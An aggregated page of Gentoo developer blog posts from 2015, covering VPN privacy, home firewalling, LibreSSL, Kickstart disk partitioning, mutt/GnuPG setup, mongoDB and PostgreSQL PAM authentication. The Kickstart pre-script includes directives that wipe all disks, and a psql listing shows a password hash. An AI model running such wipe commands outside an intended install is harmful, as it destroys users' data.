A trustworthy VPN is actually a very useful tool, especially if what you're afraid of is sniffing of your traffic on public WiFi and the like, because then you're only talking to a single point of presence (POP), or a limited set of them, over an encrypted protocol. The keyword here is trustworthy: instead of worrying about what people in your proximity could do with your non-encrypted traffic, you now have to worry about what the people who manage the VPN, or those in proximity to the VPN provider, would do with that information.

Even more importantly, since VPNs are generally authenticated, an attacker who can control or infiltrate your VPN provider can easily tie together all your traffic, no matter where you're connecting from. This is possibly the sole thing for which Tor is a better option, as there isn't a single manager for the VPN — although recent discussions may show that even Tor is not as safe from following a single user as some people kept promising or boasting.

These VPN services end up being advertised as either privacy tools, for the reasons just noted, or as tools against censorship. In the latter case the usual scare is the Great Firewall of China, without considering that there are very few websites that suffer what I'd call "censorship" at a country level — The Pirate Bay does not count; as much as I think it's silly and counterproductive to ban access to it, censorship is a word I'd reserve for much more venomous behaviour. Region-locking, on the other hand, as I've shown, is pretty heavy, but just saying out loud that you work around region-locking is not really good for business, as it may well be against all the terms of service that people say they accepted.

Here comes the bombshell for most people: yes, VPN services are (for the most part) not managed by angels who want all information in the world to be free. Such "heroes" are mostly created by popular culture and are much rarer than you would think. Painting them as such would be like painting MegaUpload and Kim Dotcom as generous saviours of humanity — which, admittedly, I've seen too many people do, especially in the Free Software and privacy-conscious movements.

VPN services are, for many people, quite profitable. Datacenter bandwidth is getting cheaper and cheaper, while end-user speeds are either capped, or easily capped by the VPN itself. If you make people pay for the service, it's not going to take that many users to pay for the bandwidth, and then start making profits. And many people are happy to pay for the service, either because it's still cheaper than accepting the geographical restrictions or because they go for the privacy candy.

On the other hand there are free VPN services out there, so what about them? I've been surprised before by self-defined privacy advocates suggesting to the masses to use free VPN services, while at the same time avoiding Dropbox, Microsoft and other offerings with the catchphrase «If you're not paying for it, you're the product.» Turns out for free VPN providers, you most definitely are a product.

To use the neologism I so much hate, it's always interesting to figure out how these providers monetize you, and that's not always easy because it may as well be completely passive: they could be siphoning data the same way I described in my previous post, and then use that to target you for more or less legal or ethical interests. Or they could be injecting referral codes when you browse websites with affiliate programs such as Amazon (similarly to how some Chrome extensions used to work, with the difference of being done at the router level) — this is, by the way, one extremely good reason to use HTTPS everywhere, as you can't do that kind of manipulation on protected pages without fiddling with the certificate.

Or, as it became apparent recently, they may be playing with your egress so that sure, you are now going to the Internet through some random US person's address, but at the same time, your address is being used for… something else. Which may be streaming a different version of Netflix – e.g.: the Big Bang Theory is available on French Netflix, but not in the US one – or they may be selling stolen credit card data, or browse for child porn, or whatever else they care to do.

What's the bottom line here? Well, it seems obvious that the current regime of rights that imposes region-locking of content is not only unlikely to be helping the content producers (rather than distributors) much – The Pirate Bay content never was region-locked – but it's also causing harm to people who would otherwise be happy to pay to be able to access it!

I'm not advocating for removing copyright, or that content should be free to all – I may prefer such a situation, but I don't think it's realistic – but I would pretty much like for these people to wake up and realize that if I'm ready to give them money, it would be a good thing for them to accept it without putting me at risk more than if I were not to give them money and just pirate the content.

And now go, and uninstall Hola, for universe's sake!

June 12, 2015

A while back I came across a fairly good article on the need for awareness regarding children and computers. However, I find it misses a few paragraphs (or even chapters) on the necessary steps (even without children).

None of this is, of course, the children’s fault, but it does provide a good opportunity to discuss computer security hygiene, and with it the lack of knowledge of and focus on security and privacy in current and new generations.

To start off, the article that inspired this post: Your Weakest Security Link? Your Children – WSJ

What do you do when the biggest threat to your cybersecurity lives under your own roof?

It’s a fact of life online: a network is only as strong as its weakest link. For many people, that weakest link is their children. They inadvertently download viruses. They work around security to visit sites their parents don’t want them to. They run up huge bills using their parents’ one-click ordering.

Segregated WiFi networks
My largest concern with the article is that it does not mention the need for a wifi guest network. You should never, ever allow external devices outside your control, or lower-security devices like tablets and smartphones, directly onto your LAN. These devices simply don’t need it and should be in a separate security zone on the firewall. If you need access to local resources, use OpenVPN to set up a connection from the wifi zone to the lan zone, or open up specific ports/applications to pass through for certain other elements.

My usual setup involves flashing a router/accesspoint with dd-wrt (a Linux based firmware). This allows setting up guest networks / virtual wireless interfaces (although not all devices will allow anything but open / WEP encryption on the virtual interfaces, i.e. no WPA; as these are by definition low-security zones, this is fine). The most important thing is that the guest network is

  • AP isolated, i.e. it does not allow traffic between individual devices on the network
  • only allows traffic through NAT to wan (internet), i.e. not to LAN devices
  • QoS enabled, so as not to interfere with your normal use

The guest network should further be restrictive in what traffic it allows. Normally your visitors only require HTTP(S), POP3S, IMAPS, SMTPS, SSH and maybe a few other protocols (people shouldn’t use non-encrypted transport channels for reading mail, so the non-secured alternatives are blocked), so the firewall should be restrictive as a starting point.
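As an illustration only – the interface names, subnet and exact port list below are assumptions, and dd-wrt can express most of this through its own interface – such restrictions could be sketched with iptables roughly like this:

# br-guest = guest (virtual) interface, br-lan = internal LAN, vlan2 = wan uplink (names are assumptions)
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT        # return traffic for existing connections
iptables -A FORWARD -i br-guest -o br-lan -j DROP                         # guests never reach the LAN
iptables -A FORWARD -i br-guest -o vlan2 -p tcp -m multiport --dports 22,80,443,465,587,993,995 -j ACCEPT
iptables -A FORWARD -i br-guest -j DROP                                   # everything else from guests is dropped
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o vlan2 -j MASQUERADE  # NAT the guest subnet to the internet
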

A proper network setup removes the primary issues discussed with children’s devices being connected to the network. It is no better to allow other unsecured devices onto it, so why not do it properly in the first place?

In fact, with today’s growth of the Internet of Things, you will also want a dedicated device network that is internal (no AP isolation, but no traffic allowed to lan or wan) for the TV’s communication with speakers and the like. I simply don’t get people plugging these directly into the regular network. That only leads to situations such as Samsung voice-recording / surveilling everything you say.

Disk encryption
Disk encryption is necessary in order to prevent the security schemes from being bypassed with known passwords, as mentioned in the article. I remember the good old days when NTFS first got here, and how easy it was to brute-force SAM files. Without disk encryption, separating profiles (e.g. in Windows 7) won’t help you, as anyone can boot a live OS (Linux ftw) and gain access to all files, including configuration files. But quite frankly, multi-user systems are difficult to secure, and hardware today is cheap: you shouldn’t let your kids use your own hardware in the first place, but set up their own systems for them.

Seven proxies
Be restrictive in what kind of data you allow to flow through your network. Use proxies, proxies, and even more proxies; filter all network access appropriately through firewalls; and, more importantly, make frequent use of jump servers / gateways.

If you are worried about certain types of virus intrusion, also get a firewall device supporting intrusion detection/prevention systems, and an appropriate license to keep it updated. If you are concerned about your children’s internet use, all web traffic should also be forced through a proxy (such as squid) at the firewall level.

Separate the core devices of the network and don’t allow traffic to them, even from the regular LAN, without going through a jump server / gateway, e.g. using OpenVPN. I actually use this myself: for instance, even though I connect my laptop to the regular wifi network, I won’t get access to my virtual machines without being logged into the VPN. Only certain specified services are exposed by default.

Cloud services
Cloud services are great, I mean, truly: with the number of devices we have today, how else can we keep data available for our own use? The one caveat: you really, truly, REALLY MUST run the cloud service yourself. ownCloud is a great application for this use, with clients across operating systems and platforms. File storage, calendar, contact information and a good news reader. Not much more to ask for, and if there is, there is likely already an app for it.

Don’t ever allow friends or family to use iCloud, Dropbox, Google Drive or whatnot. Of course, do promote these services to your enemies; you might want to get access to their data some day.

Nirbheek Chauhan a.k.a. nirbheek (homepage, bugs)

Come, let's meet (clap clap clap)
shilam shalo (clap clap clap)
a raw thread (clap clap clap)
let's run a race (clap clap clap)

(quickly)

Come, let's meet, shilam shalo, a raw thread, let's run a race

Plucked ten leaves
one leaf was raw
a baby deer
the deer went into the water
its grandma caught it
grandma went to London
and brought back a bangle

the bangle broke (clap)
grandma got upset (clap)

(even faster)

we'll win grandma over
we'll eat ras malai
the ras malai was lovely
we ate some fish
the fish had a bone
mummy gave us a slap
the slap stung hard
so we ate samosas
the samosas were really good

Namaste, Nanaji!

June 11, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
The Parker Fund (June 11, 2015, 02:48 UTC)

Hello all,

I don’t usually post very personal things here on The Z-Issue, but rather use it for 1) posting information that may be of interest to others (e.g. solving technical problems [especially with regard to the world of Linux Engineering]), 2) mentioning articles that I found helpful, amusing, or otherwise interesting, or 3) just babbling about who knows what. This article, though, is about something that is very special to me, and one that is intimately and inextricably tied to who I am as a person.

For those of you who have read the about me page, you know that I have devoted the majority of my academic life to studies of Child and Adolescent Development / Psychology and Education. Understanding and helping children work through their difficult times is one of my biggest passions in this life.

Over the past decade or so, I’ve given a lot of thought to having children of my own and have decided that I would rather adopt than have kids who are biologically mine. My rationale is multifaceted, but primarily, I just think that there are enough children already here that could use loving homes, and I would like to offer that to one of them instead of bringing another one into the world. So, for several years now, I’ve been trying to put any little bit of extra money that I have into savings for adopting a child. In the past year, I have started to pursue adoption more actively from a lot of angles (discussing it with attorneys, researching adoption agencies and policies, et cetera). I have also tried to squirrel away even more money by doing side jobs and such. Though I’ve been relatively successful at saving money for the adoption, I have a very long way to go based on the estimate that I have been given (approximately $85,000 USD). At the time of this writing, I have saved a mere ~17% of the funds that I will need in order to get started on the process.

Why bring up any of these things about my personal life and goals? Simply put, the idea of crowdfunding is enticing in this situation. I post my articles hoping that they will help people who find themselves in similar situations (as mentioned, particularly relating to Linux, but also to travels, and so on) as the ones in which I have found myself over the years. And, thankfully, according to the analytics for the site and comments on various posts, people are finding the articles helpful. In particular, a couple of my Linux articles have been viewed tens of thousands of times on certain days. I’ll cut to the chase: if any of my articles have been helpful to you, please consider donating ANY amount that you comfortably can to The Parker Fund–helping me reach my goal of being able to adopt. Absolutely every dollar helps, so any donation will be greatly appreciated!

Why “The Parker Fund?” As I’ve said, I have more actively started to pursue the adoption within the past year or so. I’ve pondered many different aspects of the process, and have decided that I would like to adopt a boy first. I have also chosen the name Parker, and so to keep the goal alive and real in my mind, I refer to him by name, though he may not have even been born yet. Again, to keep my motivation up through setback after setback, I have started to decorate a room for him:


Parker's room

These types of little things help keep me focused on my goal, even if they seem a little premature.

So, in effort to expedite the start of the adoption process, if you can spare any funds and would like to help me, you may contribute to The Parker Fund by using the PayPal “Donate” button in the top widget on the right-hand side of the page. As I said, every dollar helps and will be greatly appreciated! Even if you can’t or don’t want to contribute, thank you for reading the Z-Issue and taking time out of your day to read about a personal aspiration that is very near and dear to my heart.

Cheers,
Zach

June 10, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Live SELinux userspace ebuilds (June 10, 2015, 18:07 UTC)

In between courses, I pushed out live ebuilds for the SELinux userspace applications: libselinux, policycoreutils, libsemanage, libsepol, sepolgen, checkpolicy and secilc. These live ebuilds (with Gentoo version 9999) pull in the current development code of the SELinux userspace so that developers and contributors can already work with in-progress code developments as well as see how they work on a Gentoo platform.

That being said, I do not recommend the live ebuilds for anyone except developers and contributors, and only in development zones (definitely not in production). One of the reasons is that these ebuilds do not apply the Gentoo-specific patches. I would also like to remove the Gentoo-specific manipulations that we do, such as small Makefile adjustments, but let’s start with just ignoring the Gentoo patches.

Dropping the patches makes sure that we track the upstream libraries and userspace closely, and allows developers to try and send patches to the SELinux project to fix Gentoo related build problems. But as not all packages can be deployed successfully on a Gentoo system without them, some patches need to be applied anyway. For this, users can drop the necessary patches inside /etc/portage/patches, as all userspace ebuilds use the epatch_user method.
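For example (the patch file name here is made up), a local patch for the live libselinux ebuild would be dropped in place like this:

~# mkdir -p /etc/portage/patches/sys-libs/libselinux-9999
~# cp fix-gentoo-build.patch /etc/portage/patches/sys-libs/libselinux-9999/
~# emerge -1 =sys-libs/libselinux-9999
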

Finally, observant users will notice that “secilc” is also provided. This is a new package, which is probably going to have an official release with a new userspace release. It allows for building CIL-based SELinux policy code, and was one of the drivers for me to create the live ebuilds as I’m experimenting with the CIL constructions. So expect more on that later.

June 07, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
gentoo.de relaunched (June 07, 2015, 23:02 UTC)

Hi!

Two months ago, the gentoo.org website redesign was announced. For a few hours now, gentoo.de has been following suit. The similarities in look are not by coincidence: both designs were done by Alex Legler.

The new website is based on Jekyll rather than the GuideXML used previously. Any bugs you find on the website can be reported on GitHub, where the website sources are hosted.

I would like to take the opportunity to thank both Manitu and SysEleven for providing the hardware running gentoo.de (and other Gentoo e.V. services) free of charge. Very kind!

Best, Sebastian

June 06, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
LibreSSL, OpenSSL, collisions and problems (June 06, 2015, 12:33 UTC)

Some time ago, on the gentoo-dev mailing list, there was an interesting thread on the state of LibreSSL in Gentoo. In particular I repeated some of my previous concerns about ABI and API compatibility, especially when trying to keep both libraries on the same system.

While I hope that the problems I pointed out are quite clear to the LibreSSL developers, I thought that reiterating them clearly in a blog post would give them a wider reach, and thus a better chance of being addressed. Please feel free to reshare this in response to people hand-waving the idea that LibreSSL can be either a drop-in or a stand-aside replacement for OpenSSL.

Last year, when I first blogged about LibreSSL, I had to write a further clarification as my post was used to imply that you could just replace the OpenSSL binaries with LibreSSL and be done with it. This is not the case and I won't even go back there. What I'm concerned about this time is whether you can install the two in the same system, and somehow decide which one you want to use on a per-package basis.

Let's start with the first question: why would you want to do that? Everybody at this point knows that LibreSSL was forked from the OpenSSL code and started removing code that was deemed unnecessary or even dangerous – a very positive thing, given the amount of compatibility kludges around OpenSSL! – and as such it was a subset of the same interface as its parent, so there would seem to be no reason to want the two libraries on the same system.

But then again, LibreSSL was never meant to be considered a drop-in replacement, so its developers haven't cared as much about the evolution of OpenSSL, and just proceeded in their own direction; that direction included building a new library, libtls, that implements higher-level abstractions of the TLS protocol. This vaguely matches the way NSS (the Netscape-now-Mozilla TLS library) is designed, and I think it makes sense: it reduces the amount of repetition that needs to be coded in multiple parts of the software stack to implement HTTPS, for instance, reducing the chance of one of them making a stupid mistake.

Unfortunately, this library was originally tied firmly to LibreSSL and there was no way for it to be usable with OpenSSL — I think this has changed recently as a "portable" build of libtls should be available. Ironically, this wouldn't have been a problem at all if it wasn't that LibreSSL is not a superset of OpenSSL, as this is where the core of the issue lies.

By far, this is not the first time a problem like this happens in Open Source software communities: different people will want to implement the same concept in different ways. I like to describe this as software biodiversity and I find it generally a good thing. Having more people looking at the same concept from different angles can improve things substantially, especially in regard to finding safe implementations of network protocols.

But there is a problem when you apply parallel evolution to software: if you fork a project and then evolve it on your own agenda, but keep the same library names and a mostly compatible (thus conflicting) API/ABI, you're going to make people suffer, whether they are developers, consumers, packagers or users.

LibreSSL, libav, Ghostscript, ... there are plenty of examples. Since the features of the projects, their API and most definitely their ABIs are not the same, when you're building a project on top of any of these (or their originators), you'll end up at some point making a conscious decision on which one you want to rely on. Sometimes you can do that based only on your technical needs, but in most cases you end up with a compromise based on technical needs, licensing concerns and availability in the ecosystem.

These projects didn't change the names of their libraries; that way they can be used as drop-rebuild replacements for consumers that keep to the greatest common divisor of the interface, but it also means you can't easily install two of them on the same system. And since most distributions, with the exception of Gentoo, would not really provide the users with a choice of multiple implementations, you end up with either a fractured ecosystem, or one that is very much non-diverse.

So if all distributions decide to standardize on one implementation, that's what the developers will write for. And this is why OpenSSL is likely to stay the standard for a long while still. Of course in this case it's not as bad as the situation with libav/ffmpeg, as the base featureset is going to be more or less the same, and the APIs that have been dropped up to now, such as the entropy-gathering daemon interface, have been considered A Bad Idea™ for a while, so there are not going to be OpenSSL-only source projects in the future.

What becomes an issue here is that software is built against OpenSSL right now, and you can't really change this easily. I've been told before that this is not true, because OpenBSD switched, but there is a huge difference between all of the BSDs and your usual Linux distributions: the former have much more control on what they have to support.

In particular, the whole base system is released in a single scoop, and it generally includes all the binary packages you can possibly install. Very few third party software providers release binary packages for OpenBSD, and not many more do for NetBSD or FreeBSD. So as long as you either use the binaries provided by those projects or those built by you on the same system, switching the provider is fairly easy.

When you have to support third-party binaries, then you have a big problem, because a given binary may be built against one provider, but depend on a library that depends on the other. So unless you have full control of your system, with no binary packages at all, you're going to have to provide the most likely provider — which right now is OpenSSL, for good or bad.

Gentoo Linux is, once again, in a more favourable position than many others. As long as you have a full source stack, you can easily choose your provider without considering its popularity. I have built similar stacks before, and my servers deploy stacks similarly, although I have not tried using LibreSSL for any of them yet. But on the desktop it might be trickier, especially if you want to do things like playing Steam games.

But here's the harsh reality: even if you were to install the libraries in different directories, and you were to provide a USE flag to choose between the two, it is not going to be easy to apply the right constraints between final executables and libraries all the way through the tree.

I'm not sure I have an answer that balances the ability to just make old software use the new library against side-by-side installation. I'm scared that the "solution" that will be found for this problem is bundling, and you can probably figure out that doing so for software like OpenSSL or LibreSSL is a terrible idea, given how fast you should update in response to a security vulnerability.

June 05, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

This article is one of the most-viewed on The Z-Issue, and is sometimes read thousands of times per day. If it has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

So, for several weeks now, I’ve been struggling with disk naming and UDEV as they relate to RHEL or CentOS Kickstart automation via PXE. Basically, what used to be a relatively straight-forward process of setting up partitions based on disk name (e.g. /dev/sda for the primary disk, /dev/sdb for the secondary disk, and so on) has become a little more complicated due to the order in which the kernel may identify disks with UDEV implementations. The originally-used naming conventions of /dev/sdX may no longer be consistent across reboots or across machines. How this problem came to my attention was when I was Kickstarting a bunch of hosts, and realised that several of them were indicating that there wasn’t enough space on the drives that I had referenced. After doing some digging, I realised that some servers were identifying KVM-based media (like via a Cisco UCS CIMC interface), or other USB media as primary disks instead of the actual primary SCSI-based disks (SATA or SAS drives).

Though I agree that identifying disks by their path, their UUID, or an otherwise more permanent name is preferred to the ambiguous /dev/sdX naming scheme, it did cause a problem, and one that didn’t have a readily-identifiable workaround for my situation. My first thought was to use UUID, or gather the disk ID from /dev/disk/by-id/. However, that wouldn’t work because it wouldn’t be the same across all servers, so automatic installations via PXE wouldn’t be feasible. Next, I looked at referencing disks by their PCI location, which can be found within /dev/disk/by-path/. Unfortunately, I found that the PCI location might vary between servers as well. For example, I found:

Server 1:
/dev/disk/by-path/pci-0000:82:00.0-scsi-0:2:0:0 –> primary SCSI disk
/dev/disk/by-path/pci-0000:82:00.0-scsi-0:2:1:0 –> secondary SCSI disk

Server 2:
/dev/disk/by-path/pci-0000:0b:00.0-scsi-0:2:0:0 –> primary SCSI disk
/dev/disk/by-path/pci-0000:0b:00.0-scsi-0:2:1:0 –> secondary SCSI disk

That being said, I did notice one commonality between the servers that I used for testing. The primary and secondary disks (which, by the way, are RAID arrays attached to the same controller) all ended with ‘scsi-0:2:0:0 ‘ for the primary disk, and ‘scsi-0:2:1:0 ‘ for the secondary disk. Thinking that I could possibly just specify using a wildcard, I tried:

part /boot --fstype ext2 --size=100 --ondisk=disk/by-path/*scsi-0:2:0:0

but alas, that caused Anaconda to error out stating that the specified drive did not exist. At this point, I thought that all hope was lost in terms of automation. Then, however, I had a flash of genius (they don’t happen all that often). I could probably gather the full path ID in a pre-installation script, and then get the FULL path ID into the Kickstart configuration file with an include. Here are the code snippets that I wrote:


%pre --interpreter=/bin/bash
## Get the full by-path ID of the primary and secondary disks
osdisk=$(ls -lh /dev/disk/by-path/ | grep 'scsi-0:2:0:0 ' | awk '{print $9}')
datadisk=$(ls -lh /dev/disk/by-path/ | grep 'scsi-0:2:1:0 ' | awk '{print $9}')


## Create a temporary file with the partition scheme to be included in the KS config
echo "# Partitioning scheme" > /tmp/partition_layout
echo "clearpart --all" >> /tmp/partition_layout
echo "zerombr" >> /tmp/partition_layout
echo "part /boot --fstype ext2 --size=100 --ondisk=disk/by-path/$osdisk" >> /tmp/partition_layout
echo "part swap --recommended --ondisk=disk/by-path/$osdisk" >> /tmp/partition_layout
echo "part pv.01 --size=100 --grow --ondisk=disk/by-path/$osdisk" >> /tmp/partition_layout
echo "part pv.02 --size=100 --grow --ondisk=disk/by-path/$datadisk" >> /tmp/partition_layout
echo "volgroup vg_os pv.01" >> /tmp/partition_layout
echo "volgroup vg_data pv.02" >> /tmp/partition_layout
echo "logvol / --vgname=vg_os --size=100 --name=lv_os --fstype=ext4 --grow" >> /tmp/partition_layout
echo "logvol /data --vgname=vg_data --size=100 --name=lv_data --fstype=ext4 --grow" >> /tmp/partition_layout
echo "# Bootloader location" >> /tmp/partition_layout
echo "bootloader --location=mbr --driveorder=/dev/disk/by-path/$osdisk,/dev/disk/by-path/$datadisk --append=\"rhgb\"" >> /tmp/partition_layout
%end

Some notes about the pre-installation script would be: 1) yes, I know that it is a bit clumsy, but it functions despite the lack of elegance; 2) in lines 3 and 4, make sure that the grep statements include a final space. The final space (e.g. grep 'scsi-0:2:0:0 ' instead of just grep 'scsi-0:2:0:0') is important because the machine may have partitions already set up, and in that case, those partitions would be identified as '*scsi-0:2:0:0-part#' where # is the partition number.

So, this pre-installation script generates a file called /tmp/partition_layout that essentially has a normal partition scheme for a Kickstart configuration file, but references the primary and secondary SCSI disks (again, as RAID arrays attached to the same controller) by their full ‘by-path’ IDs. Then, the key is to include that file within the Kickstart configuration via:


# Partitioning scheme information gathered from pre-install script below
%include /tmp/partition_layout

I am happy to report that for the servers that I have tested thus far, this method works. Is it possible that there will be primary and secondary disks that are identified via different path IDs not caught by my pre-installation script? Yes, that is possible. It’s also possible that your situation will require a completely different pre-installation script to gather the unique identifier of your choice. That being said, I hope that this post will help you devise your method of reliably identifying disks so that you can create the partition scheme automatically via your Kickstart configuration file. That way, you can then deploy it to many servers via PXE (or any other implementation that you’re currently utilising for mass deployment).

Cheers,
Zach

Robin Johnson a.k.a. robbat2 (homepage, bugs)
gnupg-2.1 mutt (June 05, 2015, 17:25 UTC)

For the mutt users with GnuPG: depending on your configuration, you might notice that mutt's handling of GnuPG mail stopped working with GnuPG 2.1. There were a few specific cases that would have caused this, which I'll detail, but if you just want it to work again, put the below into your Muttrc, and make the tweak to gpg-agent.conf. The underlying cause for most of it is that secret key operations have moved to the agent, and many Mutt users used the agent-less mode, because Mutt handled the passphrase nicely on its own.

  • -u must now come BEFORE --cleansign
  • Add allow-loopback-pinentry to gpg-agent.conf, and restart the agent
  • The below config adds --pinentry-mode loopback before --passphrase-fd 0, so that GnuPG (and the agent) will accept it from Mutt still.
  • --verbose is optional; depending on what you're doing, you might find --no-verbose cleaner.
  • --trust-model always is a personal preference for my Mutt mail usage, because I do try and curate my keyring
set pgp_autosign = yes
set pgp_use_gpg_agent = no
set pgp_timeout = 600
set pgp_sign_as="(your key here)"
set pgp_ignore_subkeys = no

set pgp_decode_command="gpg %?p?--pinentry-mode loopback  --passphrase-fd 0? --verbose --no-auto-check-trustdb --batch --output - %f"
set pgp_verify_command="gpg --pinentry-mode loopback --verbose --batch --output - --no-auto-check-trustdb --verify %s %f"
set pgp_decrypt_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --output - %f"
set pgp_sign_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --output - --armor --textmode %?a?-u %a? --detach-sign %f"
set pgp_clearsign_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --output - --armor --textmode %?a?-u %a? --detach-sign %f"
set pgp_encrypt_sign_command="pgpewrap gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --textmode --trust-model always --output - %?a?-u %a? --armor --encrypt --sign --armor -- -r %r -- %f"
set pgp_encrypt_only_command="pgpewrap gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --trust-model always --output - --encrypt --textmode --armor -- -r %r -- %f"
set pgp_import_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --import -v %f"
set pgp_export_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --export --armor %r"
set pgp_verify_key_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --fingerprint --check-sigs %r"
set pgp_list_pubring_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --with-colons --list-keys %r"
set pgp_list_secring_command="gpg %?p?--pinentry-mode loopback --passphrase-fd 0? --verbose --batch --with-colons --list-secret-keys %r"
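For the gpg-agent.conf change from the list above, a minimal sketch (assuming the default ~/.gnupg location) would be:

# let the agent accept the passphrase handed over by Mutt via loopback pinentry
echo "allow-loopback-pinentry" >> ~/.gnupg/gpg-agent.conf
# make the running agent pick up the change
gpg-connect-agent reloadagent /bye
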

This entry was originally posted at http://robbat2.dreamwidth.org/238770.html. Please comment there using OpenID.

May 26, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In my previous post regarding the migration of our production cluster to mongoDB 3.0 WiredTiger, we successfully upgraded all the secondaries of our replica-sets with decent performances and (almost, read on) no breakage.

Step 2 plan

The next step of our migration was to test our work load on WiredTiger primaries. After all, this is where the new engine would finally demonstrate all its capabilities.

  • We thus scheduled a step down from our 3.0 MMAPv1 primary servers so that our WiredTiger secondaries would take over.
  • Not migrating the primaries was a safety net in case something went wrong… And boy it went so wrong we’re glad we played it safe that way !
  • We rolled back after 10 minutes of utter bitterness.

The failure

After all the wait and expectation, I can’t express our level of disappointment at work when we saw that the WiredTiger engine could not handle our workload. Our application immediately started to throw 50 to 250 WriteConflict errors per minute!

Turns out that we are affected by this bug and that, of course, we’re not the only ones. So far it seems that it affects collections with:

  • heavy insert / update work loads
  • a unique index (or compound index)

The breakages

We also discovered that we’re affected by a weird new mongodump behaviour where the dumped BSON file does not contain the number of documents that mongodump said it was exporting. This is clearly a new problem, because it happened right after all our secondaries switched to WiredTiger.

Since we have to ensure strong consistency of our exports, and the mongoDB guys don’t seem so keen on moving on the bug (which I surely can understand), there is a large possibility that we’ll have to roll back even the WiredTiger secondaries altogether.

Not to mention that since the 3.0 version, we experience some CPU overloads crashing the entire server on our MMAPv1 primaries that we’re still trying to tackle before opening another JIRA bug…

Sad panda

Of course, any new major release such as 3.0 causes headaches and brings its share of bugs. We were ready for this, hence the safety steps we took to ensure that we could roll back on any problem.

But as a long time advocate of mongoDB I must admit my frustration, even more after the time it took to get this 3.0 out and all the expectations that came with it.

I hope I can share some better news on the next blog post.

May 25, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)

I have been running a PostgreSQL cluster for a while as the primary backend for many services. The database system is very robust, well supported by the community and very powerful. In this post, I’m going to show how I use central authentication and authorization with PostgreSQL.

Centralized management is an important principle whenever deployments become very dispersed. For authentication and authorization, a highly available LDAP is one of the more powerful components in any architecture. It isn’t the only method though – it is also possible to use a distributed approach where the master data is centrally managed, but the relevant data is distributed to the various systems that need it. Such a distributed approach allows for high availability without the need for a highly available central infrastructure (user ids, group membership and passwords are distributed to the servers rather than queried centrally). Here, I’m going to focus on a mixture of both methods: central authentication for password verification, and distributed authorization.

PostgreSQL uses in-database credentials by default

By default, PostgreSQL uses in-database credentials for the authentication and authorization. When a CREATE ROLE (or CREATE USER) command is issued with a password, it is stored in the pg_catalog.pg_authid table:

postgres# select rolname, rolpassword from pg_catalog.pg_authid;
    rolname     |             rolpassword             
----------------+-------------------------------------
 postgres_admin | 
 dmvsl          | 
 johan          | 
 hdc_owner      | 
 hdc_reader     | 
 hdc_readwrite  | 
 hadoop         | 
 swift          | 
 sean           | 
 hdpreport      | 
 postgres       | md5c127bc9fc185daf0e06e785876e38484

Authorizations are also stored in the database (and unless I’m mistaken, this cannot be moved outside):

postgres# \l db_hadoop
                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    |     Access privileges     
-----------+-----------+----------+------------+------------+---------------------------
 db_hadoop | hdc_owner | UTF8     | en_US.utf8 | en_US.utf8 | hdc_owner=CTc/hdc_owner  +
           |           |          |            |            | hdc_reader=c/hdc_owner   +
           |           |          |            |            | hdc_readwrite=c/hdc_owner

Furthermore, PostgreSQL has some additional access controls through its pg_hba.conf file, in which the access towards the PostgreSQL service itself can be governed based on context information (such as originating IP address, target database, etc.).

For more information about the standard setups for PostgreSQL, definitely go through the official PostgreSQL documentation as it is well documented and kept up-to-date.

Now, for central management, in-database settings become more difficult to handle.

Using PAM for authentication

The first step in moving the management of authentication and authorization outside the database is to find a way to authenticate users (password verification) externally. I tend not to use a distributed password approach (where a central component is responsible for changing passwords on multiple targets), instead relying on a highly available LDAP setup, but with local caching (to catch short-lived network hiccups) and local passwords for last-hope accounts (such as root and admin accounts).

PostgreSQL can be configured to directly interact with an LDAP, but I like to use Linux PAM whenever I can. For my systems, it is a standard way of managing the authentication of many services, so the same goes for PostgreSQL. And with the sys-auth/pam_ldap package, integrating multiple services with LDAP is a breeze. So the first step is to have PostgreSQL use PAM for authentication. This is handled through its pg_hba.conf file:

# TYPE  DATABASE        USER    ADDRESS         METHOD          [OPTIONS]
local   all             all                     md5
host    all             all     all             pam             pamservice=postgresql

This will have PostgreSQL use the postgresql PAM service for authentication. The PAM configuration is thus in /etc/pam.d/postgresql. In it, we can either directly use the LDAP PAM modules, or use the SSSD modules and have SSSD work with LDAP.
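A minimal sketch of what that PAM service file could look like when using pam_ldap directly (pam_sss.so would be used analogously; the exact module options depend on your setup):

# /etc/pam.d/postgresql
auth     required     pam_ldap.so
account  required     pam_ldap.so
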

Yet, this isn’t sufficient. We still need to tell PostgreSQL which users can be authenticated – the users need to be defined in the database (just without password credentials because that is handled externally now). This is done together with the authorization handling.

Users and group membership

Every service on the systems I maintain has dedicated groups in which for instance its administrators are listed. For instance, for the PostgreSQL services:

# getent group gpgsqladmin
gpgsqladmin:x:413843:swift,dmvsl

A local batch job (run through cron) queries this group (which I call the masterlist), as well as which users in PostgreSQL are assigned the postgres_admin role (a superuser role like postgres, used as the intermediate role to assign to administrators of a PostgreSQL service), known as the slavelist. The deltas between the two are then used to add or remove users.

# Note: membersToAdd / membersToRemove / _psql are custom functions
#       so do not vainly search for them on your system ;-)
for member in $(membersToAdd ${masterlist} ${slavelist}) ; do
  _psql "CREATE USER ${member} LOGIN INHERIT;" postgres
  _psql "GRANT postgres_admin TO ${member};" postgres
done

for member in $(membersToRemove ${masterlist} ${slavelist}) ; do
  _psql "REVOKE postgres_admin FROM ${member};" postgres
  _psql "DROP USER ${member};" postgres
done

